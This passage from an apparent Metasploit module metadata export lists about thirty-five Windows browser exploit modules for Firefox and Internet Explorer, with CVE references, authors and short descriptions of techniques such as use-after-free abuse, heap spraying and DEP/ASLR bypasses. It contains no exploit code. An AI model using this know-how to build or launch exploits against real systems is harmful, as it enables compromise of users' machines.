AttributeChildRemoved. Since mFirstChild is not set to NULL until after this call is made, this means the removed child will be accessible after it has been removed. By carefully manipulating the memory layout, this can lead to arbitrary code execution.","Metasploit Framework License (BSD)","f","2011-12-06 00:00:00",0,,"passive","t","CVE-2011-3659, OSVDB-78736, URL-http://www.zerodayinitiative.com/advisories/upcoming/, URL-https://bugzilla.mozilla.org/show_bug.cgi?id=708198","Lincoln , corelanc0d3r , regenrecht" 451,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/mozilla_interleaved_write.rb","exploit","windows/browser/mozilla_interleaved_write","exploit/windows/browser/mozilla_interleaved_write","Mozilla Firefox Interleaved document.write/appendChild Memory Corruption",300,"This module exploits a code execution vulnerability in Mozilla Firefox caused by interleaved calls to document.write and appendChild. This module was written based on a live exploit found in the wild.","Metasploit Framework License (BSD)","f","2010-10-25 00:00:00",0,,"passive","t","BID-15352, CVE-2010-3765, EDB-15352, OSVDB-68905, URL-http://www.mozilla.org/security/announce/2010/mfsa2010-73.html, URL-https://bugzilla.mozilla.org/show_bug.cgi?id=607222","scriptjunkie, unknown" 452,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/mozilla_mchannel.rb","exploit","windows/browser/mozilla_mchannel","exploit/windows/browser/mozilla_mchannel","Mozilla Firefox 3.6.16 mChannel Use-After-Free Vulnerability",300,"This module exploits an use after free vulnerability in Mozilla Firefox 3.6.16. An OBJECT Element mChannel can be freed via the OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel becomes a dangling pointer and can be reused when setting the OBJECTs data attribute. (Discovered by regenrecht). This module uses heapspray with a minimal ROP chain to bypass DEP on Windows XP SP3. Additionlay, a windows 7 target was provided using JAVA 6 and below to avoid aslr.","Metasploit Framework License (BSD)","f","2011-05-10 00:00:00",0,,"passive","t","CVE-2011-0065, OSVDB-72085, URL-http://www.mozilla.org/security/announce/2011/mfsa2011-13.html, URL-https://bugzilla.mozilla.org/show_bug.cgi?id=634986","Rh0, mr_me , regenrecht" 453,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/mozilla_nssvgvalue.rb","exploit","windows/browser/mozilla_nssvgvalue","exploit/windows/browser/mozilla_nssvgvalue","Firefox 7/8 (<= 8.0.1) nsSVGValue Out-of-Bounds Access Vulnerability",200,"This module exploits an out-of-bounds access flaw in Firefox 7 and 8 (<= 8.0.1). The notification of nsSVGValue observers via nsSVGValue::NotifyObservers(x,y) uses a loop which can result in an out-of-bounds access to attacker-controlled memory. The mObserver ElementAt() function (which picks up pointers), does not validate if a given index is out of bound. If a custom observer of nsSVGValue is created, which removes elements from the original observer, and memory layout is manipulated properly, the ElementAt() function might pick up an attacker provided pointer, which can be leveraged to gain remote arbitrary code execution.","Metasploit Framework License (BSD)","f","2011-12-06 00:00:00",0,,"passive","t","CVE-2011-3658, OSVDB-77953, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-056/, URL-https://bugzilla.mozilla.org/show_bug.cgi?id=708186","Lincoln , corelanc0d3r , regenrecht" 454,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/mozilla_nstreerange.rb","exploit","windows/browser/mozilla_nstreerange","exploit/windows/browser/mozilla_nstreerange","Mozilla Firefox ""nsTreeRange"" Dangling Pointer Vulnerability",300,"This module exploits a code execution vulnerability in Mozilla Firefox 3.6.x <= 3.6.16 and 3.5.x <= 3.5.17 found in nsTreeSelection. By overwriting a subfunction of invalidateSelection it is possible to free the nsTreeRange object that the function currently operates on. Any further operations on the freed object can result in remote code execution. Utilizing the call setup the function provides it's possible to bypass DEP without the need for a ROP. Sadly this exploit is still either dependent on Java or bound by ASLR because Firefox doesn't employ any ASLR-free modules anymore.","Metasploit Framework License (BSD)","f","2011-02-02 00:00:00",0,,"passive","t","BID-47663, CVE-2011-0073, OSVDB-72087, URL-http://www.mozilla.org/security/announce/2011/mfsa2011-13.html, URL-http://www.zerodayinitiative.com/advisories/ZDI-11-157/, URL-https://bugzilla.mozilla.org/show_bug.cgi?id=630919","regenrecht, xero" 455,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/mozilla_reduceright.rb","exploit","windows/browser/mozilla_reduceright","exploit/windows/browser/mozilla_reduceright","Mozilla Firefox Array.reduceRight() Integer Overflow",300,"This module exploits a vulnerability found in Mozilla Firefox 3.6. When an array object is configured with a large length value, the reduceRight() method may cause an invalid index being used, allowing abitrary remote code execution. Please note that the exploit requires a longer amount of time (compare to a typical browser exploit) in order to gain control of the machine.","Metasploit Framework License (BSD)","f","2011-06-21 00:00:00",0,,"passive","t","CVE-2011-2371, EDB-17974, URL-https://bugzilla.mozilla.org/show_bug.cgi?id=664009","Chris Rohlf, Matteo Memelli, TecR0c , Yan Ivnitskiy, dookie2000ca, mr_me , sinn3r " 456,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb","exploit","windows/browser/ms03_020_ie_objecttype","exploit/windows/browser/ms03_020_ie_objecttype","MS03-020 Internet Explorer Object Type",300,"This module exploits a vulnerability in Internet Explorer's handling of the OBJECT type attribute.","Metasploit Framework License (BSD)","f","2003-06-04 00:00:00",0,,"passive","t","BID-7806, CVE-2003-0344, MSB-MS03-020, OSVDB-2967","skape " 457,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms05_054_onload.rb","exploit","windows/browser/ms05_054_onload","exploit/windows/browser/ms05_054_onload","MS05-054 Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution",300,"This bug is triggered when the browser handles a JavaScript 'onLoad' handler in conjunction with an improperly initialized 'window()' JavaScript function. This exploit results in a call to an address lower than the heap. The javascript prompt() places our shellcode near where the call operand points to. We call prompt() multiple times in separate iframes to place our return address. We hide the prompts in a popup window behind the main window. We spray the heap a second time with our shellcode and point the return address to the heap. I use a fairly high address to make this exploit more reliable. IE will crash when the exploit completes. Also, please note that Internet Explorer must allow popups in order to continue exploitation.","Metasploit Framework License (BSD)","f","2005-11-21 00:00:00",0,,"passive","t","BID-13799, CVE-2005-1790, MSB-MS05-054, OSVDB-17094, URL-http://www.cvedetails.com/cve/CVE-2005-1790","Benjamin Tobias Franz, Sam Sharps, Stuart Pearson" 458,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb","exploit","windows/browser/ms06_001_wmf_setabortproc","exploit/windows/browser/ms06_001_wmf_setabortproc","Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution",500,"This module exploits a vulnerability in the GDI library included with Windows XP and 2003. This vulnerability uses the 'Escape' metafile function to execute arbitrary code through the SetAbortProc procedure. This module generates a random WMF record stream for each request.","Metasploit Framework License (BSD)","f","2005-12-27 00:00:00",0,,"passive","t","BID-16074, CVE-2005-4560, MSB-MS06-001, OSVDB-21987, URL-http://wvware.sourceforge.net/caolan/ora-wmf.html, URL-http://www.geocad.ru/new/site/Formats/Graphics/wmf/wmf.txt, URL-http://www.microsoft.com/technet/security/advisory/912840.mspx","O600KO78RUS , hdm , san " 459,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms06_013_createtextrange.rb","exploit","windows/browser/ms06_013_createtextrange","exploit/windows/browser/ms06_013_createtextrange","Internet Explorer createTextRange() Code Execution",300,"This module exploits a code execution vulnerability in Microsoft Internet Explorer. Both IE6 and IE7 (Beta 2) are vulnerable. It will corrupt memory in a way, which, under certain circumstances, can lead to an invalid/corrupt table pointer dereference. EIP will point to a very remote, non-existent memory location. This module is the result of merging three different exploit submissions and has only been reliably tested against Windows XP SP2. This vulnerability was independently discovered by multiple parties. The heap spray method used by this exploit was pioneered by Skylined.","Metasploit Framework License (BSD)","f","2006-03-19 00:00:00",0,,"passive","t","BID-17196, CVE-2006-1359, MSB-MS06-013, OSVDB-24050, URL-http://seclists.org/lists/bugtraq/2006/Mar/0410.html, URL-http://seclists.org/lists/fulldisclosure/2006/Mar/1439.html, URL-http://secunia.com/secunia_research/2006-7/advisory/, URL-http://www.shog9.com/crashIE.html, US-CERT-VU-876678","Darkeagle , Faithless , Unknown, hdm , justfriends4n0w " 460,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms06_055_vml_method.rb","exploit","windows/browser/ms06_055_vml_method","exploit/windows/browser/ms06_055_vml_method","Internet Explorer VML Fill Method Code Execution",300,"This module exploits a code execution vulnerability in Microsoft Internet Explorer using a buffer overflow in the VML processing code (VGX.dll). This module has been tested on Windows 2000 SP4, Windows XP SP0, and Windows XP SP2.","Metasploit Framework License (BSD)","f","2006-09-19 00:00:00",0,,"passive","t","BID-20096, CVE-2006-4868, MSB-MS06-055, OSVDB-28946","Aviv Raff , M. Shirk , Mr.Niega , Trirat Puttaraksa (Kira) , hdm " 461,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms06_057_webview_setslice.rb","exploit","windows/browser/ms06_057_webview_setslice","exploit/windows/browser/ms06_057_webview_setslice","Internet Explorer WebViewFolderIcon setSlice() Overflow",300,"This module exploits a flaw in the WebViewFolderIcon ActiveX control included with Windows 2000, Windows XP, and Windows 2003. This flaw was published during the Month of Browser Bugs project (MoBB #18).","Metasploit Framework License (BSD)","f","2006-07-17 00:00:00",0,,"passive","t","BID-19030, CVE-2006-3730, MSB-MS06-057, OSVDB-27110, URL-http://browserfun.blogspot.com/2006/07/mobb-18-webviewfoldericon-setslice.html","hdm " 462,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms06_067_keyframe.rb","exploit","windows/browser/ms06_067_keyframe","exploit/windows/browser/ms06_067_keyframe","Internet Explorer Daxctle.OCX KeyFrame Method Heap Buffer Overflow Vulnerability",300,"This module exploits a heap overflow vulnerability in the KeyFrame method of the direct animation ActiveX control. This is a port of the exploit implemented by Alexander Sotirov.","Metasploit Framework License (BSD)","f","2006-11-14 00:00:00",0,,"passive","t","BID-20047, CVE-2006-4777, MSB-MS06-067, OSVDB-28842, URL-https://www.blackhat.com/presentations/bh-eu-07/Sotirov/Sotirov-Source-Code.zip","Alexander Sotirov , skape " 463,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms06_071_xml_core.rb","exploit","windows/browser/ms06_071_xml_core","exploit/windows/browser/ms06_071_xml_core","Internet Explorer XML Core Services HTTP Request Handling",300,"This module exploits a code execution vulnerability in Microsoft XML Core Services which exists in the XMLHTTP ActiveX control. This module is the modifed version of http://www.milw0rm.com/exploits/2743 - credit to str0ke. This module has been successfully tested on Windows 2000 SP4, Windows XP SP2, Windows 2003 Server SP0 with IE6 + Microsoft XML Core Services 4.0 SP2.","Metasploit Framework License (BSD)","f","2006-10-10 00:00:00",0,,"passive","t","BID-20915, CVE-2006-5745, MSB-MS06-071, OSVDB-29425","Trirat Puttaraksa " 464,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb","exploit","windows/browser/ms07_017_ani_loadimage_chunksize","exploit/windows/browser/ms07_017_ani_loadimage_chunksize","Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)",500,"This module exploits a buffer overflow vulnerability in the LoadAniIcon() function in USER32.dll. The flaw can be triggered through Internet Explorer 6 and 7 by using the CURSOR style sheet directive to load a malicious .ANI file. The module can also exploit Mozilla Firefox by using a UNC path in a moz-icon URL and serving the .ANI file over WebDAV. The vulnerable code in USER32.dll will catch any exceptions that occur while the invalid cursor is loaded, causing the exploit to silently fail when the wrong target has been chosen. This vulnerability was discovered by Alexander Sotirov of Determina and was rediscovered, in the wild, by McAfee.","Metasploit Framework License (BSD)","f","2007-03-28 00:00:00",0,,"passive","t","BID-23194, CVE-2007-0038, MSB-MS07-017, OSVDB-33629, URL-http://www.determina.com/security.research/vulnerabilities/ani-header.html, URL-http://www.microsoft.com/technet/security/advisory/935423.mspx","Solar Eclipse , hdm , skape " 465,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb","exploit","windows/browser/ms08_041_snapshotviewer","exploit/windows/browser/ms08_041_snapshotviewer","Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download",600,"This module allows remote attackers to place arbitrary files on a users file system via the Microsoft Office Snapshot Viewer ActiveX Control.","Metasploit Framework License (BSD)","f","2008-07-07 00:00:00",0,,"passive","t","BID-30114, CVE-2008-2463, MSB-MS08-041, OSVDB-46749","MC " 466,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms08_053_mediaencoder.rb","exploit","windows/browser/ms08_053_mediaencoder","exploit/windows/browser/ms08_053_mediaencoder","Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow",300,"This module exploits a stack buffer overflow in Windows Media Encoder 9. When sending an overly long string to the GetDetailsString() method of wmex.dll an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2008-09-09 00:00:00",0,,"passive","t","BID-31065, CVE-2008-3008, MSB-MS08-053, OSVDB-47962","MC " 467,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb","exploit","windows/browser/ms08_070_visual_studio_msmask","exploit/windows/browser/ms08_070_visual_studio_msmask","Microsoft Visual Studio Mdmask32.ocx ActiveX Buffer Overflow",300,"This module exploits a stack buffer overflow in Microsoft's Visual Studio 6.0. When passing a specially crafted string to the Mask parameter of the Mdmask32.ocx ActiveX Control, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2008-08-13 00:00:00",0,,"passive","t","BID-30674, CVE-2008-3704, MSB-MS08-070, OSVDB-47475","MC , koshi" 468,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms08_078_xml_corruption.rb","exploit","windows/browser/ms08_078_xml_corruption","exploit/windows/browser/ms08_078_xml_corruption","Internet Explorer Data Binding Memory Corruption",300,"This module exploits a vulnerability in the data binding feature of Internet Explorer. In order to execute code reliably, this module uses the .NET DLL memory technique pioneered by Alexander Sotirov and Mark Dowd. This method is used to create a fake vtable at a known location with all methods pointing to our payload. Since the .text segment of the .NET DLL is non-writable, a prefixed code stub is used to copy the payload into a new memory segment and continue execution from there.","Metasploit Framework License (BSD)","f","2008-12-07 00:00:00",0,,"passive","t","BID-32721, CVE-2008-4844, MSB-MS08-078, OSVDB-50622, URL-http://taossa.com/archive/bh08sotirovdowd.pdf, URL-http://www.microsoft.com/technet/security/advisory/961051.mspx","hdm " 469,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms09_002_memory_corruption.rb","exploit","windows/browser/ms09_002_memory_corruption","exploit/windows/browser/ms09_002_memory_corruption","Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption",300,"This module exploits an error related to the CFunctionPointer function when attempting to access uninitialized memory. A remote attacker could exploit this vulnerability to corrupt memory and execute arbitrary code on the system with the privileges of the victim.","Metasploit Framework License (BSD)","f","2009-02-10 00:00:00",0,,"passive","t","CVE-2009-0075, MSB-MS09-002, OSVDB-51839","dean " 470,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb","exploit","windows/browser/ms09_043_owc_htmlurl","exploit/windows/browser/ms09_043_owc_htmlurl","Microsoft OWC Spreadsheet HTMLURL Buffer Overflow",300,"This module exploits a buffer overflow in Microsoft's Office Web Components. When passing an overly long string as the ""HTMLURL"" parameter an attacker can execute arbitrary code.","Metasploit Framework License (BSD)","f","2009-08-11 00:00:00",1,,"passive","t","BID-35992, CVE-2009-1534, MSB-MS09-043, OSVDB-56916, URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=819","jduck " 471,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms09_043_owc_msdso.rb","exploit","windows/browser/ms09_043_owc_msdso","exploit/windows/browser/ms09_043_owc_msdso","Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption",300,"This module exploits a memory corruption vulnerability within versions 10 and 11 of the Office Web Component Spreadsheet ActiveX control. This module was based on an exploit found in the wild.","Metasploit Framework License (BSD)","f","2009-07-13 00:00:00",0,,"passive","t","CVE-2009-1136, EDB-9163, MSB-MS09-043, OSVDB-55806, URL-http://ahmed.obied.net/software/code/exploits/ie_owc.py, URL-http://www.microsoft.com/technet/security/advisory/973472.mspx","Ahmed Obied, DSR! , hdm , unknown" 472,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms09_072_style_object.rb","exploit","windows/browser/ms09_072_style_object","exploit/windows/browser/ms09_072_style_object","Internet Explorer Style getElementsByTagName Memory Corruption",300,"This module exploits a vulnerability in the getElementsByTagName function as implemented within Internet Explorer.","Metasploit Framework License (BSD)","f","2009-11-20 00:00:00",0,,"passive","t","BID-37085, CVE-2009-3672, MSB-MS09-072, OSVDB-50622, URL-http://taossa.com/archive/bh08sotirovdowd.pdf, URL-http://www.microsoft.com/technet/security/advisory/977981.mspx","jduck , securitylab.ir " 473,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms10_002_aurora.rb","exploit","windows/browser/ms10_002_aurora","exploit/windows/browser/ms10_002_aurora","Internet Explorer ""Aurora"" Memory Corruption",300,"This module exploits a memory corruption flaw in Internet Explorer. This flaw was found in the wild and was a key component of the ""Operation Aurora"" attacks that lead to the compromise of a number of high profile companies. The exploit code is a direct port of the public sample published to the Wepawet malware analysis site. The technique used by this module is currently identical to the public sample, as such, only Internet Explorer 6 can be reliably exploited.","Metasploit Framework License (BSD)","f","2010-01-14 00:00:00",0,,"passive","t","CVE-2010-0249, MSB-MS10-002, OSVDB-61697, URL-http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js, URL-http://www.microsoft.com/technet/security/advisory/979352.mspx","hdm , unknown" 474,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms10_002_ie_object.rb","exploit","windows/browser/ms10_002_ie_object","exploit/windows/browser/ms10_002_ie_object","MS10-002 Internet Explorer Object Memory Use-After-Free",300,"This module exploits a vulnerability found in Internet Explorer's mshtml component. Due to the way IE handles objects in memory, it is possible to cause a pointer in CTableRowCellsCollectionCacheItem::GetNext to be used even after it gets freed, therefore allowing remote code execution under the context of the user. This particular vulnerability was also one of 2012's Pwn2Own challenges, and was later explained by Peter Vreugdenhil with exploitation details. Instead of Peter's method, this module uses heap spraying like the 99% to store a specially crafted memory layout before re-using the freed memory.","Metasploit Framework License (BSD)","f","2010-01-21 00:00:00",0,,"passive","t","CVE-2010-0248, MSB-MS10-002, OSVDB-61914, URL-http://dvlabs.tippingpoint.com/blog/2012/03/15/pwn2own-2012-challenge-writeup, URL-http://www.zerodayinitiative.com/advisories/ZDI-10-014/","Peter Vreugdenhil, juan vazquez , sinn3r " 475,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb","exploit","windows/browser/ms10_018_ie_behaviors","exploit/windows/browser/ms10_018_ie_behaviors","Internet Explorer DHTML Behaviors Use After Free",400,"This module exploits a use-after-free vulnerability within the DHTML behaviors functionality of Microsoft Internet Explorer versions 6 and 7. This bug was discovered being used in-the-wild and was previously known as the ""iepeers"" vulnerability. The name comes from Microsoft's suggested workaround to block access to the iepeers.dll file. According to Nico Waisman, ""The bug itself is when trying to persist an object using the setAttribute, which end up calling VariantChangeTypeEx with both the source and the destination being the same variant. So if you send as a variant an IDISPATCH the algorithm will try to do a VariantClear of the destination before using it. This will end up on a call to PlainRelease which deref the reference and clean the object."" NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.","Metasploit Framework License (BSD)","f","2010-03-09 00:00:00",0,,"passive","t","BID-38615, CVE-2010-0806, MSB-MS10-018, OSVDB-62810, URL-http://eticanicomana.blogspot.com/2010/03/aleatory-persitent-threat.html, URL-http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day-attack-announced-cve-2010-0806/, URL-http://www.microsoft.com/technet/security/advisory/981374.mspx","Nanika, Trancer , jduck , unknown" 476,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb","exploit","windows/browser/ms10_018_ie_tabular_activex","exploit/windows/browser/ms10_018_ie_tabular_activex","Internet Explorer Tabular Data Control ActiveX Memory Corruption",400,"This module exploits a memory corruption vulnerability in the Internet Explorer Tabular Data ActiveX Control. Microsoft reports that version 5.01 and 6 of Internet Explorer are vulnerable. By specifying a long value as the ""DataURL"" parameter to this control, it is possible to write a NUL byte outside the bounds of an array. By targeting control flow data on the stack, an attacker can execute arbitrary code.","Metasploit Framework License (BSD)","f","2010-03-09 00:00:00",0,,"passive","t","BID-39025, CVE-2010-0805, MSB-MS10-018, OSVDB-63329, URL-http://www.zerodayinitiative.com/advisories/ZDI-10-034","Unknown, jduck " 477,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb","exploit","windows/browser/ms10_022_ie_vbscript_winhlp32","exploit/windows/browser/ms10_022_ie_vbscript_winhlp32","Internet Explorer Winhlp32.exe MsgBox Code Execution",500,"This module exploits a code execution vulnerability that occurs when a user presses F1 on MessageBox originated from VBscript within a web page. When the user hits F1, the MessageBox help functionaility will attempt to load and use a HLP file from an SMB or WebDAV (if the WebDAV redirector is enabled) server. This particular version of the exploit implements a WebDAV server that will serve HLP file as well as a payload EXE. During testing warnings about the payload EXE being unsigned were witnessed. A future version of this module might use other methods that do not create such a warning.","Metasploit Framework License (BSD)","f","2010-02-26 00:00:00",0,,"passive","t","CVE-2010-0483, MSB-MS10-023, OSVDB-62632, URL-http://blogs.technet.com/msrc/archive/2010/02/28/investigating-a-new-win32hlp-and-internet-explorer-issue.aspx, URL-http://isec.pl/vulnerabilities/isec-0027-msgbox-helpfile-ie.txt, URL-http://www.microsoft.com/technet/security/advisory/981169.mspx","Maurycy Prodeus, jduck " 478,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb","exploit","windows/browser/ms10_026_avi_nsamplespersec","exploit/windows/browser/ms10_026_avi_nsamplespersec","MS10-026 Microsoft MPEG Layer-3 Audio Stack Based Overflow",300,"This module exploits a buffer overlow in l3codecx.ax while processing a AVI files with MPEG Layer-3 audio contents. The overflow only allows to overwrite with 0's so the three least significant bytes of EIP saved on stack are overwritten and shellcode is mapped using the .NET DLL memory technique pioneered by Alexander Sotirov and Mark Dowd. Please note on IE 8 targets, your malicious URL must be a trusted site in order to load the .Net control.","Metasploit Framework License (BSD)","f","2010-04-13 00:00:00",0,,"passive","t","BID-39303, CVE-2010-0480, MSB-MS10-026, OSVDB-63749, URL-http://www.exploit-db.com/moaub-5-microsoft-mpeg-layer-3-audio-stack-based-overflow/, URL-http://www.phreedom.org/research/bypassing-browser-memory-protections/","Jordi Sanchez , Shahin Ramezany , Yamata Li, juan vazquez " 479,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb","exploit","windows/browser/ms10_042_helpctr_xss_cmd_exec","exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec","Microsoft Help Center XSS and Command Execution",600,"Help and Support Center is the default application provided to access online documentation for Microsoft Windows. Microsoft supports accessing help documents directly via URLs by installing a protocol handler for the scheme ""hcp"". Due to an error in validation of input to hcp:// combined with a local cross site scripting vulnerability and a specialized mechanism to launch the XSS trigger, arbitrary command execution can be achieved. On IE7 on XP SP2 or SP3, code execution is automatic. If WMP9 is installed, it can be used to launch the exploit automatically. If IE8 and WMP11, either can be used to launch the attack, but both pop dialog boxes asking the user if execution should continue. This exploit detects if non-intrusive mechanisms are available and will use one if possible. In the case of both IE8 and WMP11, the exploit defaults to using an iframe on IE8, but is configurable by setting the DIALOGMECH option to ""none"" or ""player"". This module creates a WebDAV service from which the payload is copied to the victim machine.","Metasploit Framework License (BSD)","f","2010-06-09 00:00:00",0,,"passive","t","CVE-2010-1885, MSB-MS10-042, OSVDB-65264, URL-http://lock.cmpxchg8b.com/b10a58b75029f79b5f93f4add3ddf992/ADVISORY, URL-http://www.microsoft.com/technet/security/advisory/2219475.mspx","Tavis Ormandy, natron " 480,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb","exploit","windows/browser/ms10_046_shortcut_icon_dllloader","exploit/windows/browser/ms10_046_shortcut_icon_dllloader","Microsoft Windows Shell LNK Code Execution",600,"This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL. This module creates a WebDAV service that can be used to run an arbitrary payload when accessed as a UNC path.","Metasploit Framework License (BSD)","f","2010-07-16 00:00:00",0,,"passive","t","CVE-2010-2568, MSB-MS10-046, OSVDB-66387, URL-http://www.microsoft.com/technet/security/advisory/2286198.mspx","B_H, hdm , jduck " 481,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb","exploit","windows/browser/ms10_090_ie_css_clip","exploit/windows/browser/ms10_090_ie_css_clip","Internet Explorer CSS SetUserClip Memory Corruption",400,"Thie module exploits a memory corruption vulnerability within Microsoft's HTML engine (mshtml). When parsing an HTML page containing a specially crafted CSS tag, memory corruption occurs that can lead arbitrary code execution. It seems like Microsoft code inadvertantly increments a vtable pointer to point to an unaligned address within the vtable's function pointers. This leads to the program counter being set to the address determined by the address ""[vtable+0x30+1]"". The particular address depends on the exact version of the mshtml library in use. Since the address depends on the version of mshtml, some versions may not be exploitable. Specifically, those ending up with a program counter value within another module, in kernel space, or just not able to be reached with various memory spraying techniques. Also, since the address is not controllable, it is unlikely to be possible to use ROP to bypass non-executable memory protections.","Metasploit Framework License (BSD)","f","2010-11-03 00:00:00",0,,"passive","t","BID-44536, CVE-2010-3962, EDB-15421, MSB-MS10-090, OSVDB-68987, URL-http://www.microsoft.com/technet/security/advisory/2458511.mspx","Matteo Memelli, Yuange, jduck , unknown" 482,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms11_003_ie_css_import.rb","exploit","windows/browser/ms11_003_ie_css_import","exploit/windows/browser/ms11_003_ie_css_import","Internet Explorer CSS Recursive Import Use After Free",400,"This module exploits a memory corruption vulnerability within Microsoft\'s HTML engine (mshtml). When parsing an HTML page containing a recursive CSS import, a C++ object is deleted and later reused. This leads to arbitrary code execution. This exploit utilizes a combination of heap spraying and the .NET 2.0 'mscorie.dll' module to bypass DEP and ASLR. This module does not opt-in to ASLR. As such, this module should be reliable on all Windows versions with .NET 2.0.50727 installed.","Metasploit Framework License (BSD)","f","2010-11-29 00:00:00",0,,"passive","t","BID-45246, CVE-2010-3971, MSB-MS11-003, OSVDB-69796, URL-http://seclists.org/fulldisclosure/2010/Dec/110, URL-http://www.breakingpointsystems.com/community/blog/ie-vulnerability/, URL-http://www.microsoft.com/technet/security/advisory/2488013.mspx, URL-http://www.wooyun.org/bugs/wooyun-2010-0885, URL-http://xcon.xfocus.net/XCon2010_ChenXie_EN.pdf","d0c_s4vage, jduck , passerby" 483,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb","exploit","windows/browser/ms11_050_mshtml_cobjectelement","exploit/windows/browser/ms11_050_mshtml_cobjectelement","MS11-050 IE mshtml!CObjectElement Use After Free",300,"This module exploits a use-after-free vulnerability in Internet Explorer. The vulnerability occurs when an invalid tag exists and other elements overlap/cover where the object tag should be when rendered (due to their styles/positioning). The mshtml!CObjectElement is then freed from memory because it is invalid. However, the mshtml!CDisplay object for the page continues to keep a reference to the freed and attempts to call a function on it, leading to the use-after-free. Please note that for IE 8 targets, JRE (Java Runtime Environment) is required to bypass DEP (Data Execution Prevention).","Metasploit Framework License (BSD)","f","2011-06-16 00:00:00",0,,"passive","t","CVE-2011-1260, MSB-MS11-050, OSVDB-72950, URL-http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.html","bannedit , d0c_s4vage, sinn3r " 484,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms11_081_option.rb","exploit","windows/browser/ms11_081_option","exploit/windows/browser/ms11_081_option","Microsoft Internet Explorer Option Element Use-After-Free",300,"This module exploits a vulnerability in Microsoft Internet Explorer. A memory corruption may occur when the Option cache isn't updated properly, which allows other JavaScript methods to access a deleted Option element, and results in code execution under the context of the user.","Metasploit Framework License (BSD)","f","2012-10-11 00:00:00",0,,"passive","t","CVE-2011-1996, MSB-MS11-081, URL-http://ifsec.blogspot.com/2011/10/internet-explorer-option-element-remote.html, URL-http://pastebin.com/YLH725Aj","Ivan Fratric, juan vazquez , sinn3r " 485,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms11_093_ole32.rb","exploit","windows/browser/ms11_093_ole32","exploit/windows/browser/ms11_093_ole32","MS11-093 Microsoft Windows OLE Object File Handling Remote Code Execution",300,"This module exploits a type confusion vulnerability in the OLE32 component of Windows XP SP3. The vulnerability exists in the 